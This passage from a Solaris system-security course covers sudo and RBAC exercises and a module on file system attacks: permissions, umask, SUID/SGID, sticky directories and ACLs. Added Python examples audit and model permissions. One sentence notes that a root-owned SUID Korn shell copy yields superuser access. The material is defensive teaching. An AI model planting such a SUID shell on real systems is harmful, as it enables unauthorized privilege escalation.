2. Look at the documentation in the /usr/local/doc/sudo file or read the manual page (in /usr/local/man):

# man sudo

3. Edit the /usr/local/etc/sudoers file to contain:

# visudo

Defaults syslog=auth

Cmnd_Alias PWD=/usr/bin/passwd [A-Z0-9a-z]*, !/usr/bin/passwd root
Cmnd_Alias USERMOD=/usr/sbin/usermod,PWD
Cmnd_Alias USERADD=/usr/sbin/useradd
Host_Alias WORKSTATION=<hostname>
User_Alias ADMIN=alice
User_Alias USERADMIN=bob

ADMIN ALL=USERMOD,USERADD
# bob may run his commands on this workstation only (the Host_Alias above)
USERADMIN WORKSTATION=USERMOD

root ALL=(ALL) ALL

4. Update the /etc/syslog.conf file to include the following line (this line should be there from the exercises in Module 2, “Using Solaris OE Log Files”):

# vi /etc/syslog.conf

auth.crit;auth.notice;auth.info /var/adm/sc300log

5. Test your configuration.


Configuring RBAC

1. Create a profile for the two required command sets by adding the following lines to the /etc/security/exec_attr file:

Passwords:suser:cmd:::/usr/bin/passwd:uid=0
User Add:suser:cmd:::/usr/sbin/useradd:euid=0
User Mod:suser:cmd:::/usr/sbin/usermod:euid=0

2. Add the following lines to the /etc/security/prof_attr file to complete the profile definitions:

Passwords:::Change passwords:
User Add:::Add new users:
User Mod:::Modify existing users:

3. Create two new roles, giving each a profile Korn shell and a valid password. One role should allow the User Mod and Passwords profiles, and the other the User Add profile:

# roleadd -P "User Mod,Passwords" -s /usr/bin/pfksh UserMod
# passwd UserMod
...
# roleadd -P "User Add" -s /usr/bin/pfksh UserAdd
# passwd UserAdd
...

4. Allocate the required roles to the alice and bob users by running these commands:

# usermod -P All -R UserAdd,UserMod alice
# usermod -P All -R UserMod bob

5. Test your changes, ensuring that the user alice can use the su command to assume either role but the user bob can only use the su command to assume the UserMod role. From within the profiles, ensure that alice can add a user and bob can modify a user.

6. Finally, reassure yourself that you cannot log in as a profile user (use telnet to reconnect to your workstation).


Module 8

File System Attacks

Objectives

Upon completion of this module, you should be able to:

● Set secure file permissions and ownerships

● Describe the security implications of using set-user-id (SUID) programs

● Describe the security implications of setting sticky bits on directories

● Configure and use access control lists (ACLs)

● Encrypt data using the crypt command

● Describe the security implications of device files

● Describe common security issues with backup and restore strategies


Relevance


Discussion – Protecting file systems and system resources from invasion and damage requires constant vigilance. Consider the following questions:

● How can files and directories be protected from unwanted attacks or unauthorized access?

● How can you increase the security on file systems and directories while still allowing selected users the access they need?

● When it appears that set-user-id (SUID) programs are causing security problems, how can you remedy the situation?


Additional Resources

Additional resources – The following references provide additional information on the topics described in this module:

● Garfinkel, Simson, and Gene Spafford. Practical UNIX & Internet Security. O’Reilly & Associates, Inc., 1996.

● Farrow, Rik. UNIX System Security. Addison Wesley, 1991.

● Online manual pages for chmod(1), getfacl(1), and setfacl(1)


Guidelines for Setting Up the root Partition

A key security requirement for a Solaris OE is to protect the root file system from overflow and subsequent Denial of Service (DoS). Protect the root file system by separating slices or partitions for all directories that are writable by ordinary users. At the very least, mount the following directories on separate disk slices or partitions:

● /tmp

● /var

● /export/home (and any other user home directories)

Consider putting the following directories under /var onto separate slices or partitions to protect the administration information (such as log files):

● /var/spool

● /var/tmp

● /var/news (if you are running the news server)


Preventing Users From Filling the /tmp File

A simple DoS attack is when a user creates a large file in the /tmp directory. This prevents any utility that needs to write to this directory from running. This problem is made worse if the /tmp directory is part of the root partition or mounted on the swap partition. More often, problems with the /tmp directory filling are accidental. Often, files are created in /tmp (by users and system administrators alike) and forgotten.

To minimize DoS problems caused by limited space on /tmp, use one of the following methods:

● Enable quotas on the /tmp directory if it is mounted as a standard UNIX file system (UFS) so that no single user can fill up more than 40 percent of the file system

● Monitor the free space on the /tmp directory with a script that runs regularly

● Mount the /tmp directory on its own partition rather than on swap space, which might affect system performance if large numbers of temporary files are used (such as during compilation)


Using Temporary File Systems

It is not only the /tmp directory that can be mounted on the swap space. To enhance the performance of applications that involve large numbers of temporary files, it is sometimes appropriate to create a pseudo file system called a temporary file system, or tmpfs. It is termed temporary because the files and data in it are not retained when the system is rebooted.

Temporary file systems reduce the time-intensive resources needed to create and destroy files, because the file creation and destruction is typically performed in memory rather than on the disk. Compiling a C++ program is an example of a process which creates and deletes large numbers of temporary files. Compilation time is greatly reduced using a temporary file system.

If you have a temporary file system, be aware that it uses the system swap space for storage. If the contents of the temporary file system increase, you will see a proportional loss of available swap space. When investigating the lack of swap space, consider temporary file systems as possible culprits.


To find out which file systems are mounted on the swap space, use the df -F command, as shown in Code 8-1.

Code 8-1 Finding Out Which File Systems Are Mounted on the Swap Space

# df -k -F tmpfs
Filesystem kbytes used avail capacity Mounted on
swap 690752 8 690744 1% /var/run
swap 690752 8 690744 1% /tmp


Preventing DoS Due to Limited Swap Space

Swap space stores process memory images when they are paged or swapped out of main memory. The reduced cost of memory has reduced the need and importance of swap space, and many performance-critical systems are configured to ensure that processes are never swapped.

It is more common to find swap space used on systems that are used for development or for testing. If the system runs out of swap space, then new processes cannot run, which creates a DoS situation. An intruder can force this DoS by creating a large number of processes, each of which requires huge amounts of memory.

Note – It is much easier for an intruder to create and run memory-hungry programs if you leave a C/C++ compiler or any other language compiler on the system.

If you run out of swap space, first assess whether the cause is accidental or malicious intent. To determine which processes are using a lot of swap space, use the ps, prstat, sdtprocess, or top commands to display process memory usage and paging activity.


If you run out of swap space because valid processes have used up all available space, add additional swap space using the swap command. Use the mkfile command to create the file and preallocate disk space to it. For example:

# mkfile 50m /export/home/swapfile
# swap -a /export/home/swapfile

increases the size of swap by 50 Mbytes (although this incurs the loss of usable file space).

Note – This is not a permanent solution, and the swap space returns to its original size on reboot. To permanently allocate the extra swap space, add the new swap file to the /etc/vfstab file and designate the file system type as swap:

/export/home/swapfile - - swap - no -

If rogue processes are using the swap space, use the kill command to terminate them. Then consider using the ulimit command to restrict the amount of virtual memory a user’s process can use.

For the Bourne shell or Korn shell, add the following line to the /etc/profile file to put a hard limit of 250 Kbytes on the amount of virtual memory a process can use:

ulimit -Hv 250


Setting File System Permissions for Security

Setting file and directory permissions is one of the most basic ways to enforce security on a system. Permissions on files and directories allow users to control who can access their files or directories for reading, writing, searching, and executing.

File ownership and access controls are sometimes the final defense against intruders that have already breached other security protections. So the subject is worth reviewing when considering security.

Access is controlled by the file’s mode bits, also known as permission bits. The three basic types are:

● read – The file or directory can be opened and read.

● write – The file or directory can be opened and written to. Write does not imply read.

● execute – Compiled program files can be executed and directories can be searched.

There are slightly different meanings to these bits for directories compared to all other types of files.


File Permissions

The file permissions are:

● read – The file can be opened and read. Read implies a file can be copied.

● write – A file can be overwritten from any point or new data appended to the file. Write does not imply read, so existing file data cannot be read and then modified. Write does not imply a file can be deleted (see “Directory Permissions” on page 8-12).

● execute – Compiled program files can be executed. Executable files do not require read permission but shell script files need both read and execute permissions.


Directory Permissions

The directory permissions are:

● read – The directory can be opened and read. For directories, this means file names can be listed, but the files cannot be accessed (because the i-node cannot be read).

● write – A directory can be updated. This means that files can be created, deleted, or renamed regardless of the permissions on the file itself. The ability to remove a file is not controlled by the file’s permissions, but by the permissions of the directory containing the file.

● execute – A directory can be searched, giving access to the files within the directory.


Permission Categories

Three sets of permission bits exist, for user, group, and others. Each set controls the access of one category of user:

● One set controls the access of the owner of the file.

● One set controls the access for the members of a group.

● One set controls the access for all other users.

It is possible for users to set permissions that would deny themselves access to their own files while granting open access to the rest of the world. It is a common mistake to believe that there is an implied hierarchy between owner, group, and others with regard to file and directory permissions.


Review the following rules that describe how file access is determined:

● If the user is the owner of the file, then only the owner permission bits are considered.

● If the user is not the owner, but is a member of the group owning the file, then only the group permissions are considered.

● If the user is neither the owner nor a member of the group owning the file, then only the other permissions are considered.


Review File Permissions

Test your understanding of the UNIX file permissions by studying the system output shown in Code 8-2, and answering the questions on page 8-15.

Code 8-2 UNIX File Permissions

alice$ id -a
uid=102(alice) gid=10(staff) groups=10(staff),1(other)

bob$ id -a
uid=103(bob) gid=1(other) groups=12(sysadmin),1(other)

alice$ ls -al work
total 4
drwxrwxr-x 2 alice other 512 Jul 5 15:37 .
drwxr-xr-x 3 alice other 512 Jul 5 15:34 ..
-rw-r--r-- 1 alice staff 0 Jul 5 15:34 file1
-r--r--r-- 1 bob other 0 Jul 5 15:36 file2
-rw------- 1 bob sysadmin 0 Jul 5 15:37 file3
-rw--w--w- 1 alice staff 0 Jul 5 15:36 log


1. Which files can alice read?

2. Which files can bob read?

3. Which files can alice write?

4. Which files can bob write?

5. Which files can alice delete?

6. Which files can bob delete?

7. What use are the odd permissions on the file log?


Implications of Lax Permissions

Allowing files to have wider access permissions (that is, with more permission bits set) than is required can constitute a security risk. The common problems with lax permissions are:

● A loss of confidentiality that leads to data theft or privacy violation.

● They leave “holes” in the file system that allow back doors and Trojan horses to be created.

● There are more opportunities for intruders to instigate DoS attacks.

● Information can be gleaned that can later be used to mount an attack on this and other systems.


Preventing Lax Permissions Using the umask Setting

The UNIX file-creation mask, called umask, can set the default file permissions for newly created files. A process inherits its umask setting from the parent process so, to be fully effective, the umask setting should be set for the login process. With the Solaris OE, you do this by setting the umask in the /etc/default/login file.

The umask setting, as its name implies, is a bit mask applied to the file permissions: each bit set in the umask is removed from the mode a new file would otherwise receive, so the mask specifies those permissions you do not want set when a file is created. With umask set to 0 the default file-creation mode is:

● -rw-rw-rw- or octal 666 for a text file

● -rwxrwxrwx or octal 777 for a directory or executable file


In the Solaris OE, by default, the umask is set to octal 022 in the /etc/profile file. This has the effect of subtracting the write permission for group and the world as follows:

● -rw-r--r-- or octal 644 for a text file

● -rwxr-xr-x or octal 755 for a directory or executable file

Historically, this umask setting was chosen to encourage file sharing between users.

If these defaults are not restrictive enough for your environment, consider setting the umask to octal 077. This ensures that only the owner of the file has any access to it.

Although setting the umask is useful for keeping file systems secure, it is not sufficient to rely on your umask setting. There is nothing to prevent you or your users from changing the file permissions after the file has been created, and users can change the umask setting in their .profile file.

Checking File Permissions

Using the umask setting to reinforce your file permission policy is the first-line defense against file system attacks. The second-line defense is to check the file system for file permission discrepancies.

Module 9, “Auditing File Systems” describes how to use file digests, the Solaris OE Fingerprint Database, and the third-party tool TripWire to check file system permissions (and much more). At the very least, it is good practice to use the find command to obtain a list of files that are world-writable, and change the permissions on any of these files or directories as necessary. The following find commands print out all files that are world-writable:

# find / -perm -o=w -print
# find / -perm -002 -print

It is particularly important that system startup or configuration files should not be world-writable.


Set-User-ID and Set-Group-ID Files

Sometimes users must have special permissions to accomplish certain tasks such as editing the password file to change their password. If you give the user write permission to the /etc/passwd and /etc/shadow files, there will be security implications. Instead, the user can run the passwd program which runs with the authority of the superuser but limits what the normal user can accomplish. In this case, the passwd program prevents the user from changing anyone else’s password.

For a program to take on another user’s effective UID, an extra permission bit must be set on the program, and the program must be owned by the user whose effective UID it takes on. The extra bit is called the set-user-id bit (SUID). Similarly, a program can take on a different effective GID. A program can be both SUID and SGID at the same time.

Whether the program controls the user identity or the group identity, the same potential security threat exists. For example, a user can become the superuser simply by running a SUID copy of the Korn shell (/usr/bin/ksh) that is owned by the root user.


This is a fundamental security issue in UNIX, and identifying and securing SUID and SGID programs is necessary to prevent potential attacks on your systems.

You should closely monitor the behavior of compiled programs that have SUID or SGID privileges. Only install new SUID programs if absolutely necessary, and then only after you have:

● Reassured yourself of the credentials of the source of the program

● Tested it thoroughly on a stand-alone system

Although compiled programs can be altered by intruders, this is not a simple task. However, shell scripts provide an open invitation for attack. With regard to SUID and SGID shell scripts, the security solution is simple:

● Never install SUID or SGID shell scripts.

● Check file systems regularly for SUID and SGID shell scripts and remove them.

Note – The Bourne shell (/bin/sh) does not support SUID or SGID semantics on shell scripts unless the -p option is specified on the command line when the shell is invoked. This option is not normally set for a login shell.


Identifying and Changing SUID and SGID Bits

You can identify SUID and SGID programs in a directory listing because they have an “s” where the “x” for execute would usually be found. For example, the following file has both the SUID and SGID bit set:

-r-sr-sr-- 4 root sys 101744 Jan 1 2000 /bin/passwd

Use the chmod utility to set or clear these bits. To clear the SUID bit, use:

$ chmod u-s file

To clear the SGID bit, use:

$ chmod g-s file

Use the find command with the following options to locate all SUID and SGID files on your system. Better yet, incorporate these commands into a script that runs on a daily basis:

# find / \( -perm -u=s -o -perm -g=s \) -type f -print


This command prints out all plain file types with the SUID or SGID permissions set.
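An audit script of the kind the text recommends running daily, added here as an example (it is not part of the course material): it walks a directory tree and reports world-writable entries, SUID/SGID regular files and, separately, SUID/SGID files that are shell scripts, then diffs the result against a baseline saved by the previous run so that only new findings stand out. The sample tree, its file names and the baseline location are constructed for the demonstration; a real run would point audit_tree() at /.

```python
import json
import os
import shutil
import stat
import tempfile

CATEGORIES = ("world_writable", "suid_sgid", "suid_sgid_script")

def is_script(path):
    """True if the file starts with '#!', i.e. it is an interpreter script."""
    try:
        with open(path, "rb") as fh:
            return fh.read(2) == b"#!"
    except OSError:
        return False

def audit_tree(root):
    """Walk root like find(1) and classify each entry. A world-writable directory
    with the sticky bit (the /tmp setup in Code 8-4) is intended and not reported."""
    findings = {key: [] for key in CATEGORIES}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: never follow symlinks
            except OSError:
                continue
            mode = st.st_mode
            if stat.S_ISLNK(mode):
                continue                     # a symlink's own mode is meaningless
            if mode & stat.S_IWOTH and not (stat.S_ISDIR(mode) and mode & stat.S_ISVTX):
                findings["world_writable"].append(path)      # find -perm -002
            if stat.S_ISREG(mode) and mode & (stat.S_ISUID | stat.S_ISGID):
                findings["suid_sgid"].append(path)           # find -perm -u=s -o -perm -g=s
                if is_script(path):          # the case the text says to remove
                    findings["suid_sgid_script"].append(path)
    return {key: sorted(paths) for key, paths in findings.items()}

def new_since_baseline(findings, baseline):
    """Entries present now but absent from the previous run's saved baseline."""
    return {key: sorted(set(findings[key]) - set(baseline.get(key, [])))
            for key in CATEGORIES}

def save_baseline(findings, path):
    with open(path, "w") as fh:
        json.dump(findings, fh, indent=2)

def load_baseline(path):
    try:
        with open(path) as fh:
            return json.load(fh)
    except (OSError, ValueError):
        return {}                            # first run: everything is new

def _write(path, data, mode):
    """Create a file and set its mode explicitly, so the umask cannot skew the demo."""
    with open(path, "wb") as fh:
        fh.write(data)
    os.chmod(path, mode)

def build_demo_tree(base):
    """Constructed sample tree, not a real system: a SUID binary, a SUID shell
    script, a world-writable config file, a sticky tmp and an open directory."""
    for sub, mode in (("bin", 0o755), ("etc", 0o755), ("tmp", 0o1777),
                      ("var", 0o755), ("var/open", 0o777)):
        os.makedirs(os.path.join(base, sub))
        os.chmod(os.path.join(base, sub), mode)
    _write(os.path.join(base, "bin", "setuid-tool"), b"\x7fELF-placeholder", 0o4755)
    _write(os.path.join(base, "bin", "fixup.sh"), b"#!/bin/sh\necho hi\n", 0o4755)
    _write(os.path.join(base, "etc", "config"), b"key=value\n", 0o666)
    _write(os.path.join(base, "etc", "rc.local"), b"#!/bin/sh\n", 0o755)

def run_demo():
    """First run records a baseline; a second run after a new SUID script appears
    reports only that file. Returns (all findings, new findings) as relative paths."""
    base = tempfile.mkdtemp(prefix="sc300-audit-")
    state = tempfile.mkdtemp(prefix="sc300-baseline-")   # kept outside the audited tree
    try:
        build_demo_tree(base)
        baseline_path = os.path.join(state, "baseline.json")
        first = audit_tree(base)
        save_baseline(first, baseline_path)
        _write(os.path.join(base, "bin", "dropped"), b"#!/bin/sh\n", 0o4755)
        new = new_since_baseline(audit_tree(base), load_baseline(baseline_path))
        def rel(found):
            return {k: [os.path.relpath(p, base) for p in v] for k, v in found.items()}
        return rel(first), rel(new)
    finally:
        shutil.rmtree(base)
        shutil.rmtree(state)

if __name__ == "__main__":
    all_findings, new_findings = run_demo()
    for key in CATEGORIES:
        print(key, all_findings[key], "new:", new_findings[key])
```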

The ncheck program prints a list of each file on a block special device (if no device is specified, the contents of the /etc/vfstab file generate a list of block special devices) along with its corresponding inode number. Used with the -s option, the ncheck program prints only special files and files with SUID mode. Use this to detect SUID or SGID programs. For example, Code 8-3 checks for special files on the root partition.

Code 8-3 Checking for Special Files on the root Partition

# ncheck -s /dev/dsk/c0t0d0s0
/dev/dsk/c0t0d0s0:
44213 /usr/lib/uucp/remote.unknown
44215 /usr/lib/uucp/uucico
44222 /usr/lib/uucp/uusched
44223 /usr/lib/uucp/uuxqt
44241 /usr/sbin/static/rcp
...


Setting Sticky Bits and SGID on Directories

There are two permission bits with special meaning to directories:

● Sticky directories (drwxrwxrwt)

● SGID directories (drwxrwsr-t)

They make the files stored in those directories more secure. The following sections discuss these permission bits.


Using Sticky Directories

Although the sticky bit is redundant with regard to files [1], the Solaris OE still makes use of this bit for directories. Administrators can use it to protect a user’s files without having to give the user special privileges in an otherwise public directory. With the sticky bit set on a world-writable directory, users can create, rename, and delete their own files, but cannot rename or delete files owned by other users.

With a directory sticky bit set, a user can only delete a file from the directory if one of the following is true:

● The user owns the directory and can write to the directory.

● The user owns the file and can write to the directory.

● The user is the superuser.

[1] The original use of the sticky bit was to reduce the overhead of swapping in and out of frequently run programs by marking the memory pages so that they were less likely to be overwritten if they were not actually in use.


The commands in Code 8-4, which can only be issued by the superuser, reset the normally wide-open permissions of the /tmp directory to protect an individual user’s files from malicious or accidental damage by others.

Code 8-4 Resetting Permissions

# cd /
# ls -ld tmp
drwxrwxrwx 6 sys sys 320 Jun 11 08:43 tmp
# chmod +t /tmp
# ls -ld tmp
drwxrwxrwt 6 sys sys 320 Jun 11 08:43 tmp

The appearance of the “t” character instead of the “x” character in the execute position for other users shows that the sticky bit is set.
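A small model of the access rules from “Permission Categories” and of the sticky-directory rules above, added here as an example (it is not part of the course material). It runs over the users and listing of Code 8-2, answering questions 1 to 6 of the review, and then over a constructed /tmp-style directory before and after the chmod +t of Code 8-4; the user and group memberships are those shown by id -a in Code 8-2, and the two files under /tmp are assumed for the demonstration.

```python
import stat
from dataclasses import dataclass

@dataclass(frozen=True)
class User:
    name: str
    uid: int
    groups: frozenset      # every group the user belongs to, primary group included

@dataclass(frozen=True)
class Node:
    name: str
    mode: int              # permission bits plus setuid/setgid/sticky, as in stat(2)
    owner: str
    group: str

def parse_mode(text):
    """Turn the nine-character ls -l field ('rwxrwxrwt') into a mode integer."""
    mode = 0
    for i, ch in enumerate(text):
        if ch in "rwxst":              # lower-case s and t also imply the x bit
            mode |= 1 << (8 - i)
        if i == 2 and ch in "sS":
            mode |= stat.S_ISUID
        if i == 5 and ch in "sS":
            mode |= stat.S_ISGID
        if i == 8 and ch in "tT":
            mode |= stat.S_ISVTX
    return mode

def bits_for(user, node):
    """Exactly one set of bits applies: owner, else group, else other. There is
    no fallback to a wider set, which is how owners can lock themselves out."""
    if user.name == node.owner:
        return (node.mode >> 6) & 7
    if node.group in user.groups:
        return (node.mode >> 3) & 7
    return node.mode & 7

def can(user, node, perm):
    """perm is 'r', 'w' or 'x'. The superuser bypasses the mode bits."""
    if user.uid == 0:
        return True
    return bool(bits_for(user, node) & {"r": 4, "w": 2, "x": 1}[perm])

def can_delete(user, directory, node):
    """Removing a file needs write and search on the directory and nothing on the
    file. With the sticky bit set the user must also own the file or the directory."""
    if user.uid == 0:
        return True
    if not (can(user, directory, "w") and can(user, directory, "x")):
        return False
    if directory.mode & stat.S_ISVTX:
        return user.name in (node.owner, directory.owner)
    return True

# The users and the 'work' directory exactly as listed in Code 8-2.
ALICE = User("alice", 102, frozenset({"staff", "other"}))
BOB = User("bob", 103, frozenset({"other", "sysadmin"}))
WORK = Node("work", parse_mode("rwxrwxr-x"), "alice", "other")
WORK_FILES = (
    Node("file1", parse_mode("rw-r--r--"), "alice", "staff"),
    Node("file2", parse_mode("r--r--r--"), "bob", "other"),
    Node("file3", parse_mode("rw-------"), "bob", "sysadmin"),
    Node("log", parse_mode("rw--w--w-"), "alice", "staff"),
)

# Constructed /tmp scenario for Code 8-4: two users' files in a world-writable
# directory owned by sys, before and after chmod +t.
TMP_OPEN = Node("tmp", parse_mode("rwxrwxrwx"), "sys", "sys")
TMP_STICKY = Node("tmp", parse_mode("rwxrwxrwt"), "sys", "sys")
TMP_FILES = (
    Node("alice.out", parse_mode("rw-r--r--"), "alice", "staff"),
    Node("bob.out", parse_mode("rw-r--r--"), "bob", "other"),
)

def files_user_can(user, perm, directory=WORK, files=WORK_FILES):
    """Names of the files the user can read/write/execute ('r', 'w', 'x') or delete ('d')."""
    if perm == "d":
        return [f.name for f in files if can_delete(user, directory, f)]
    return [f.name for f in files if can(user, f, perm)]

if __name__ == "__main__":
    for user in (ALICE, BOB):            # questions 1 to 6 of the review
        for perm in "rwd":
            print(user.name, perm, files_user_can(user, perm))
    for directory in (TMP_OPEN, TMP_STICKY):
        print("sticky" if directory.mode & stat.S_ISVTX else "open",
              "bob can delete", files_user_can(BOB, "d", directory, TMP_FILES))
```

For question 7, the model shows that any user can write to log while only alice can read it back, a drop-box style log; because write permits overwriting from any point, other users could also clobber existing entries.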


Setting SGID Directories

A file created in a directory with the SGID bit set has the same group as the directory. Without the SGID bit set, the file acquires the effective GID of the user creating the file.

SGID directories are most useful for small projects where users store files in a shared directory. The SGID bit ensures that all files stored in the directory belong to the same group. As long as the file is created with group read permissions, and all project members are in the same group, there should be no problems with project members being unable to read some of the files. Correct use of umask is necessary for SGID on directories to work effectively.


As long as the users are administered securely, there should be no additional security implications in using SGID on directories.

Code 8-5 Using SGID on Directories

alice$ ls -al work
total 4
drwxrwsr-t 2 alice other 512 Jul 5 15:37 .
drwxr-xr-x 3 alice other 512 Jul 5 15:34 ..
-rw-r--r-- 1 alice other 0 Jul 5 15:34 file1
-r--r--r-- 1 bob other 0 Jul 5 15:36 file2
-rw-r--r-- 1 bob other 0 Jul 5 15:37 file3
-rw--w--w- 1 alice other 0 Jul 5 15:36 log


Securing Files Using Access Control Lists

Basic permissions of read, write, and execute for owners, groups, and others are usually sufficient for the protection of most files and directories. However, you might need to include or exclude particular users or groups from file access. Access Control Lists (ACLs) provide a finer level of access control, which can be beneficial for small, collaborative projects.

ACL entries are the way to define an ACL for a file. ACL entries are set using the setfacl command and examined using the getfacl command, both of which are described in the following section.

Many UNIX systems have added ACLs to files and directories to equip users with a more specific means of controlling access to their files. Unfortunately, this control is implemented using different commands, syntax, and behavior according to which version of UNIX is being used. This discussion of ACLs is limited to the Solaris OE implementation. ACLs were not available with the Solaris OE prior to the 2.5.1 release.


Caution – Because ACLs are not standard across different types of UNIX systems, they do not work in a heterogeneous environment. Any files and directories exported to pre-Solaris 2.5.1 or non-Solaris clients using NFS should be fully protected with the standard UNIX file permissions. ACLs are supported on UFS file systems only. This means that if you copy files onto a non-UFS file system (such as tmpfs), the ACL entries are lost.


Using the getfacl and setfacl Commands

To examine the ACL for a file, use the getfacl command. In the example shown in Code 8-6, the ls -l command lists the basic permissions on a regular text file. Next, the getfacl command displays the extended permissions, even though none have yet been added.

Code 8-6 Listing Basic Permissions on a Regular Text File

$ ls -l my_text
-rw-------   1 fred     staff         22 Jun 12 15:10 my_text
$ getfacl my_text
# file: my_text
# owner: fred
# group: staff
user::rw-
group::---              #effective:---
mask:---
other:---


With no specific ACL set, the getfacl command reports the standard UNIX permissions for user, group, and other. The mask permission is also set; it acts as a filter on the permissions, working in a similar way to the umask utility. The mask is bitwise ANDed with an entry's permissions, and the result is the effective permissions. Wherever the mask setting modifies an entry's permissions, the effective permissions are reported alongside it.


Maintain ACL entries with the setfacl command options:

● -m to modify settings

● -s to set all settings

● -d to delete a setting

● -r to recalculate the mask (always use it unless you are setting the mask explicitly)

All options accept a comma-separated list of ACL entries.

Each entry has the form category:permissions (with the user or group name between them for a named entry), for example:

$ setfacl -r -m u:groucho:rw-,g:marxbros:r-- my_text


To add extended permissions to existing basic permissions, use the setfacl command with the -m (modify) option. In the following example, read and write permissions are added for user groucho, and read permission is added for group marxbros:

$ setfacl -m u:groucho:rw-,g:marxbros:r-- my_text
$ ls -l my_text
-rw-------+  1 fred     staff         22 Jun 12 15:10 my_text

When you use the ls -l command, notice that there is now a “+” character appended to the basic permissions list, indicating that an ACL now exists on the file. The getfacl command displays the details of the extended permissions that were applied (see Code 8-7).

Code 8-7 Using the getfacl Command

$ getfacl my_text
# file: my_text
# owner: fred
# group: staff
user::rw-
user:groucho:rw-        #effective:---
group::---              #effective:---
group:marxbros:r--      #effective:---
mask:---
other:---

You might expect that user groucho could now read and write my_text, but this is not the case. As mentioned earlier, the mask must be set to the widest permissions needed by any user who was added to the control list. To make the extended permission modifications effective, use the -m option to set the mask (see Code 8-8).

Code 8-8 Using the -m Option

$ setfacl -m mask:rw- my_text
$ getfacl my_text
# file: my_text
# owner: fred
# group: staff
user::rw-
user:groucho:rw-        #effective:rw-
group::---              #effective:---
group:marxbros:r--      #effective:r--
mask:rw-
other:---

There is also an -r option to the setfacl command, which automatically sets the mask to the widest permissions required to make the ACL entries effective.

User groucho can now read and write the my_text file. The lesson to be learned here is that whenever the -m option modifies the control list, use the -r option to recalculate the mask so that the change takes effect.

Instead of making incremental changes to the control list, it might be preferable to replace the entire list of settings using the -s option. Because all of the settings are being replaced, you must specify the basic permissions, the mask settings, and the extended permissions to the command, as shown in Code 8-9.

Code 8-9 Replacing the List of Settings

$ ls -l
total 2
-rw-------   1 fred     staff          9 Jun 16 08:53 my_text
$ setfacl -s u::rw-,g::---,o:---,m:rw-,\
u:groucho:rw-,g:marxbros:r-- my_text
$ ls -l
total 2
-rw-------+  1 fred     staff          9 Jun 16 08:53 my_text
$ getfacl my_text
# file: my_text
# owner: fred
# group: staff
user::rw-
user:groucho:rw-        #effective:rw-
group::---              #effective:---
group:marxbros:r--      #effective:r--
mask:rw-
other:---
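As an added example (not code from the Sun course) of the mask rule described above and of the -m, -r, -s and -d options, the following Python models the Solaris UFS ACL semantics: it parses the layout getfacl prints, applies entries as setfacl does, and evaluates access in the order owner, named user, group class, other, with every named entry and group:: ANDed with the mask. The getfacl text is constructed from Code 8-6.

```python
# Model of the Solaris UFS ACL mask rules (added example, not the course's code):
# parses getfacl's layout, applies entries as setfacl -m, -r and -d do, and
# evaluates access in the order UFS uses: owner, named user, group class, other.
from dataclasses import dataclass, field

R, W, X = 4, 2, 1
PERM_BITS = {"r": R, "w": W, "x": X, "-": 0}


def parse_perm(s: str) -> int:
    """'rw-' -> 6; short forms such as 'rw' (seen in Code 8-9) are accepted too."""
    bits = 0
    for ch in s:
        bits |= PERM_BITS[ch]     # KeyError on anything but r, w, x or -
    return bits


@dataclass
class Acl:
    owner: str = ""
    group: str = ""
    user_obj: int = 0                            # user::  owner entry, never masked
    group_obj: int = 0                           # group:: owning group, masked
    other: int = 0                               # other:  never masked
    mask: int = 0                                # mask:   ANDed with masked entries
    users: dict = field(default_factory=dict)    # user:NAME:perm, masked
    groups: dict = field(default_factory=dict)   # group:NAME:perm, masked

    @classmethod
    def parse(cls, text: str) -> "Acl":
        """Read the '# owner:' / '# group:' header and entries as getfacl prints them."""
        acl = cls()
        for raw in text.splitlines():
            line = raw.split("#effective")[0].strip()   # drop the annotation column
            if line.startswith("# owner:"):
                acl.owner = line.split(":", 1)[1].strip()
            elif line.startswith("# group:"):
                acl.group = line.split(":", 1)[1].strip()
            elif line and not line.startswith("#"):
                acl.modify(line)
        return acl

    def modify(self, spec: str, recalc: bool = False) -> None:
        """setfacl -m SPEC: comma-separated type:[name]:perms entries (also the -s
        syntax); recalc=True adds what the -r option does."""
        for entry in spec.split(","):
            tag, *rest = [f.strip() for f in entry.split(":")]
            kind = {"u": "user", "g": "group", "m": "mask", "o": "other"}.get(tag, tag)
            perm = parse_perm(rest[-1])
            name = rest[0] if len(rest) == 2 else ""
            if kind == "user" and name:
                self.users[name] = perm
            elif kind == "group" and name:
                self.groups[name] = perm
            elif kind in ("user", "group", "mask", "other"):
                setattr(self, {"user": "user_obj", "group": "group_obj"}.get(kind, kind), perm)
            else:
                raise ValueError(f"unknown ACL entry type {tag!r}")
        if recalc:
            self.recalc_mask()

    def delete(self, spec: str) -> None:
        """setfacl -d u:NAME or g:NAME (the base entries cannot be deleted)."""
        tag, name = [f.strip() for f in spec.split(":")][:2]
        (self.users if tag in ("u", "user") else self.groups).pop(name, None)

    def recalc_mask(self) -> None:
        """-r: the mask becomes the union of every entry it filters."""
        self.mask = self.group_obj
        for perm in list(self.users.values()) + list(self.groups.values()):
            self.mask |= perm

    def can(self, user: str, user_groups, want: int) -> bool:
        """Owner, then named user, then group class (a matching group entry must
        grant all of `want`; no fall-through to other:), then other:."""
        if user == self.owner:
            return (self.user_obj & want) == want
        if user in self.users:
            return (self.users[user] & self.mask & want) == want
        matched = [self.group_obj] if self.group in user_groups else []
        matched += [p for g, p in self.groups.items() if g in user_groups]
        if matched:
            return any((p & self.mask & want) == want for p in matched)
        return (self.other & want) == want


# Constructed from Code 8-6: my_text owned by fred, mode 600, no extended entries.
GETFACL_MY_TEXT = """\
# file: my_text
# owner: fred
# group: staff
user::rw-
group::---              #effective:---
mask:---
other:---
"""
```

Replaying Code 8-7 with Acl.parse(GETFACL_MY_TEXT).modify("u:groucho:rw-,g:marxbros:r--") leaves can("groucho", [], R) false until recalc_mask() (or modify(..., recalc=True)) raises the mask to rw-, which is the -r lesson above.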


Deleting ACL Entries

You can delete users from an ACL using the setfacl -d command. For example, to remove the special permissions for groucho, use:

$ setfacl -d u:groucho my_text

Note – When a user is removed from the system, the user’s UID still appears in any ACL where the user has an entry. If the UID is reused, the new user gains access to those files controlled by the ACL. If ACLs are used on your system, in addition to removing all files belonging to a deleted user, you should also remove the user from every ACL entry. Do this using the command setfacl -d u:old_UID on every file. For example:

# find / -print | xargs setfacl -d u:old_UID


Encrypting Data

If an intruder has broken into your system and obtained superuser privileges, most of your system defenses have been broken and you should take extreme measures to resecure the system.

